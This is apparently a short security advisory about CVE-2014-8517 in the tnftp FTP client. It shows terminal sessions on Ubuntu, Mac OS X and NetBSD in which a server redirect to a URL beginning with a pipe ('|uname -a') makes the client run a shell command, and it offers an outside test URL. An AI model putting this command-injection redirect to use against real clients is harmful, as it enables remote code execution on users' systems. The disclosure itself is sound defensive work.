tnftp has a serious vulnerability

The tnftp FTP client is fairly old, but it's still widely used.

It can be found in Red Hat's Fedora, Debian, Ubuntu, Suse, Gentoo, NetBSD, FreeBSD and Apple's OS X operating systems. It is often used by internal scripts (packetmanager, update, cron ...).

You can check if you are affected by pointing your ftp-client to

http://s2p.de/tnftptest

If you get some system information about your system (uname -a) you are affected.

For example Ubuntu

myhost > ftp http://s2p.de/tnftptest
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
100% |******************************************************************************************************************************************************************************************************************| 18699       69.93 MiB/s    00:00 ETA18699 bytes retrieved in 00:00 (59.04 MiB/s)
Linux myhost 3.2.0-69-generic #103-Ubuntu SMP Tue Sep 2 05:02:14 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

If you see someting similar to
Linux myhost 3.2.0-69-generic #103-Ubuntu SMP Tue Sep 2 05:02:14 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
you are affected.

Mac OS X 10.9.5

$ ftp http://s2p.de/tnftptest
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
  0% |                                                                                                                                                                                |     0        0.00 KiB/s    --:-- ETADarwin burma.fritz.box 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64
ftp: Writing `|uname -a': Broken pipe

Darwin macbook.fritz.box 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64

NetBSD 4

> ftp http://s2p.de/tnftptest
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
  0% |                                                                                                                                                 |     0       0.00 KB/s    --:-- ETANetBSD foo.fritz.box 4.0_STABLE NetBSD 4.0_STABLE (GENERIC) #0: Sun Feb 24 17:08:14 CET 2013  root@foo.fritz.box:/mnt/src/sys/arch/i386/compile/obj/GENERIC i386
ftp: Writing `|uname -a': Broken pipe

NetBSD foo.fritz.box 4.0_STABLE NetBSD 4.0_STABLE (GENERIC) #0: Sun Feb 24 17:08:14 CET 2013  root@foo.fritz.box:/mnt/src/sys/arch/i386/compile/obj/GENERIC i386

ftp version on Mac OS X 10.9.5

> ftp
ftp> status
Not connected.
...
Version: NetBSD-ftp 20060726
ftp> exit

NetBSD-ftp 20060726

Links

• http://seclists.org/oss-sec/2014/q4/459
• https://security-tracker.debian.org/tracker/CVE-2014-8517
• http://www.securityweek.com/nix-systems-affected-ftp-remote-command-execution-vulnerability
• https://bugzilla.redhat.com/show_bug.cgi?id=1158286